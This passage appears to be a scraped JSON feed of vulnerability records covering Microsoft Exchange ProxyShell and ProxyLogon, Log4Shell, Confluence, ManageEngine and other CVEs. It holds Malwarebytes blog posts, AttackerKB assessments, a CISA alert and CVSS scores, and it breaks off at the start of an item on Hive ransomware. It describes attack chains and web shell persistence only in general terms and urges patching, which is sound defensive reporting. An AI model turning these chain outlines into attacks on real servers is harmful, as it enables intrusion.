[CVE-2021-34497](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34497>) a critical Windows MSHTML Platform RCE vulnerability.\n\nStay safe, everyone!\n\nThe post [Four in-the-wild exploits, 13 critical patches headline bumper Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/four-in-the-wild-exploits-13-critical-patches-headline-bumper-patch-tuesday/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-14T11:56:06", "type": "malwarebytes", "title": "Four in-the-wild exploits, 13 critical patches headline bumper Patch Tuesday", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31979", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34458", "CVE-2021-34473", "CVE-2021-34494", "CVE-2021-34497", "CVE-2021-34523", "CVE-2021-34527"], "modified": "2021-07-14T11:56:06", "id": "MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/four-in-the-wild-exploits-13-critical-patches-headline-bumper-patch-tuesday/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-29T18:23:40", "description": "A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.\n\n## 1\\. Log4Shell\n\n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), commonly referred to as [Log4Shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nWhen Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.\n\nThis made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. The [CISA Log4j scanner](<https://github.com/cisagov/log4j-scanner>) is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.\n\n## 2\\. CVE-2021-40539\n\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) is a REST API authentication bypass [vulnerability in ManageEngine\u2019s single sign-on (SSO) solution](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) threat-actors were likely among those exploiting the vulnerability.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it\u2019s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations.\n\n## 3\\. ProxyShell\n\nThird on the list are 3 vulnerabilities that we commonly grouped together and referred to as [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>), [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>), and [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>).\n\nThe danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control **with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\nThe vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.\n\nMicrosoft\u2019s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.\n\n## 4\\. ProxyLogon\n\nAfter the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name\u2014[ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\u2014for similar reasons. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-2685](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) all share the same description\u2014"This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443."\n\nWhile the CVE description is the same for the 4 CVE\u2019s we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws\u2014CVE-2021-26858 and CVE-2021-27065\u2014would allow an attacker to write a file to any part of the server.\n\nTogether these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nProxyLogon started out as a limited and targeted attack method attributed to a group called [Hafnium](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.\n\nMicrosoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\n## 5\\. CVE-2021-26084\n\n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of [Confluence Server and Data Center](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.\n\nShortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.\n\nOn the [Confluence Support website](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.\n\n## Lessons learned\n\nWhat does this list tell us to look out for in 2022?\n\nWell, first off, if you haven\u2019t patched one of the above we would urgently advise you to do so. And it wouldn\u2019t hurt to continue working down the [list](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) provided by CISA.\n\nSecond, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:\n\n * **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.\n * **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.\n * **Easy exploitability**. When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.\n\nSo, if you notice or hear about a vulnerability that meets these "requirements" move it to the top of your "to-patch" list.\n\nStay safe, everyone!\n\nThe post [The top 5 most routinely exploited vulnerabilities of 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T16:28:20", "type": "malwarebytes", "title": "The top 5 most routinely exploited vulnerabilities of 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-2685", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-29T16:28:20", "id": "MALWAREBYTES:B8C767042833344389F6158273089954", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-12T00:28:46", "description": "The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), and international partners have released a joint Cybersecurity Advisory (CSA) called the [2022 Top Routinely Exploited Vulnerabilities](<https://media.defense.gov/2023/Aug/03/2003273618/-1/-1/0/JOINT-CSA-2022-TOP-ROUTINELY-EXPLOITED-VULNERABILITIES.PDF>).\n\nWe went over the list and it felt like a bad trip down memory lane. If you adhere to the expression \"those who ignore history are doomed to repeat it\" then you may consider the list as a valuable resource that you can derive lessons from. Unfortunately as George Bernard Shaw said:\n\n> "We learn from history that we learn nothing from history."\n\nBut since that's a self-contradicting expression, let's assume there are lessons to be learned.\n\n## Last year's top vulnerabilities\n\nFirst let me show you the bad memories. The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. We will use the CVE codes to uniquely identify the covered vulnerabilities.\n\n * [CVE-2021-40539](<https://vulners.com/cve/CVE-2021-40539>) is a REST API authentication bypass vulnerability in [ManageEngine's single sign-on (SSO) solution](<https://www.malwarebytes.com/blog/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) which results in remote code execution (RCE). When word of this vulnerability came out it was already clear that it was being exploited in the wild. Noteworthy is that this vulnerability also made it into the [top 5 routinely exploited vulnerabilities of 2021](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>).\n * [CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>), aka [Log4Shell](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>), is a vulnerability in Apache's Log4j library, an open-source logging framework incorporated into thousands of other products. Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest throughout the first half of 2022.\n * [CVE-2018-13379](<https://vulners.com/cve/CVE-2018-13379>) is a vulnerability affecting Fortinet SSL VPNs, which was also routinely exploited in 2020 and 2021.\n * [ProxyShell](<https://www.malwarebytes.com/blog/news/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities>) is a combination of three vulnerabilities in Microsoft Exchange Server ([CVE-2021-34473](<https://vulners.com/cve/CVE-2021-34473>), [CVE-2021-31207](<https://vulners.com/cve/CVE-2021-31207>), and [CVE-2021-34523](<https://vulners.com/cve/CVE-2021-34523>)) that can be chained together to allow a remote attacker to break in, take control, and then do bad things on an unpatched server. Proxyshell also made it into the top 5 routinely exploited vulnerabilities of 2021.\n * [CVE-2021-26084](<https://vulners.com/cve/CVE-2021-26084>) is a vulnerability affecting Atlassian Confluence Server and Data Center which could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a proof-of-concept (PoC) was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021 and also made it into the top 5 routinely exploited vulnerabilities of 2021.\n\nLooking at the above, it looks like Shaw was at least partly right. We are not learning from history. It also indicates that we should be able to predict some of the vulnerabilities that will show up in next year's list. Let's take a stab at that. So we're looking for easy to overlook and/or hard to patch vulnerabilities in the 2022 list that we haven't already covered above.\n\n## This year's top vulnerabilities?\n\nThese are the ones that I think will make it to the top 10 next year, maybe together with the ones that have already been around for years.\n\n * [CVE-2022-22954](<https://vulners.com/cve/CVE-2022-22954>), [CVE-2022-22960](<https://vulners.com/cve/CVE-2022-22960>) are two vulnerabilities that can be chained to allow Remote Code Execurion (RCE), privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. Exploitation of these [VMware vulnerabilities](<https://www.malwarebytes.com/blog/news/2022/05/vmware-vulnerabilities-are-actively-being-exploited-cisa-warns>) began in early 2022 and attempts continued throughout the remainder of the year.\n * [CVE-2022-26134](<https://vulners.com/cve/CVE-2022-26134>) is a critical RCE vulnerability that affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (see CVE-2021-26084 above), which cyber actors also exploited in 2022.\n * [CVE-2022-1388](<https://vulners.com/cve/CVE-2022-1388>) is a vulnerability in the F5 [BIG IP platform](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>) that allows attackers to bypass authentication on internet-exposed iControl interfaces, potentially executing arbitrary commands, creating or deleting files, or disabling services.\n * [CVE-2022-30190](<https://vulners.com/cve/CVE-2022-30190>), aka [Follina](<https://www.malwarebytes.com/blog/news/2022/06/faq-mitigating-microsoft-offices-follina-zero-day>), is a Microsoft Windows Support Diagnostic Tool RCE vulnerability. An attacker can send you a malicious Office document that will compromise your machine with malware when you open it.\n\nSo I was hoping we can strike a deal. I'll check next year how well this prediction does and you all patch these vulnerabilities real quick, so I can write about some new ones next year.\n\n* * *\n\n**We don't just report on vulnerabilities--we identify them, and prioritize action.**\n\nCybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using [Malwarebytes Vulnerability and Patch Management](<https://www.malwarebytes.com/business/vulnerability-patch-management>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-07T18:30:00", "type": "malwarebytes", "title": "2022's most routinely exploited vulnerabilities\u2014history repeats", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26084", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-26134", "CVE-2022-30190"], "modified": "2023-08-07T18:30:00", "id": "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "href": "https://www.malwarebytes.com/blog/news/2023/08/the-2022-top-routinely-exploited-vulnerabilities-history-repeats", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-08-07T00:04:03", "description": "ProxyShell is an exploit chain targeting on-premise installations of Microsoft Exchange Server. It was demonstrated by Orange Tsai at Pwn2Own in April 2021 and is comprised of three CVEs that, when chained, allow a remote unauthenticated attacker to execute arbitrary code on vulnerable targets. The three CVEs are CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.\n\nDetails are available in Orange Tsai\u2019s [Black Hat USA 2020 talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>) and follow-on [blog series](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>). ProxyShell is being broadly exploited in the wild as of August 12, 2021.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at August 12, 2021 9:19pm UTC reported:\n\nCheck out the [Rapid7 analysis](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>) for details on the exploit chain. Seems like a lot of the PoC implementations so far are using admin mailboxes, but I\u2019d imagine folks are going to start finding ways around that soon.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-20T00:00:00", "type": "attackerkb", "title": "ProxyShell Exploit Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T00:00:00", "id": "AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "href": "https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T23:18:13", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-34473.\n\n \n**Recent assessments:** \n \n**NinjaOperator** at July 14, 2021 7:15pm UTC reported:\n\nThis remote code execution (RCE) vulnerability affects Microsoft Exchange Server 2013/ CU23/2016 CU20/2016 CU21/2019 CU10. \nAnd according to FireEye exploit code is available. \nI will share more information once MSFT releases more details\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T00:00:00", "type": "attackerkb", "title": "CVE-2021-31206", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-09-21T00:00:00", "id": "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC", "href": "https://attackerkb.com/topics/oAhIZujU2O/cve-2021-31206", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T17:21:09", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at July 14, 2021 5:15pm UTC reported:\n\nFrom <https://blog.talosintelligence.com/2021/07/microsoft-patch-tuesday-for-july-2021.html> there was a note that this vulnerability seems to have been used in some Exchange Server APT attacks detailed at <https://blog.talosintelligence.com/2021/03/hafnium-update.html> however it wasn\u2019t disclosed that this vulnerability was patched despite being patched back in April 2021. Since this was under active exploitation it is recommended to patch this vulnerability if you haven\u2019t applied April 2021\u2019s patch updates already.\n\nSuccessful exploitation will result in RCE on affected Exchange Servers, and requires no prior user privileges, so patch this soon!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T00:00:00", "type": "attackerkb", "title": "CVE-2021-34473", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-20T00:00:00", "id": "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "href": "https://attackerkb.com/topics/pUK1MXLZkW/cve-2021-34473", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-08-22T22:07:03", "description": "Malicious cyber actors are actively exploiting the following ProxyShell vulnerabilities: [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>), and [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>). An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine. CISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply [Microsoft's Security Update from May 2021](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/11/microsoft-releases-may-2021-security-updates>)\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks. \n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-21T00:00:00", "type": "cisa", "title": "Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-21T00:00:00", "id": "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "pentestpartners": [{"lastseen": "2023-05-15T15:16:47", "description": "![](https://www.pentestpartners.com/content/uploads/2020/11/hivebin.png)\n\n### Why Now?\n\nHive is not a new problem. It first surfaced in 2021 but it\u2019s becoming a much bigger issue now. This is due to a growing number of affiliates and therefore attacks. 2022 has seen more widespread country and industry target interest too.\n\nRansomware growth in general is becoming a massive problem, so much so that these incidents now make up the majority of UK government [crisis management COBRA meetings](<https://therecord.media/ransomware-incidents-now-make-up-majority-of-british-governments-crisis-management-cobra-meetings/>).\n\n### What is Hive Ransomware?\n\nHive is ransomware-as-a-service (RaaS). It\u2019s maintained by dedicated developers with affiliates using it to conduct high impact ransomware attacks with far reaching consequences.\n\nHive is organised in such a way that they have customer service, help desk, and sales departments. Victims are even directed to log in to a portal to make payment, using credentials the attackers drop in one of the files they leave behind after an 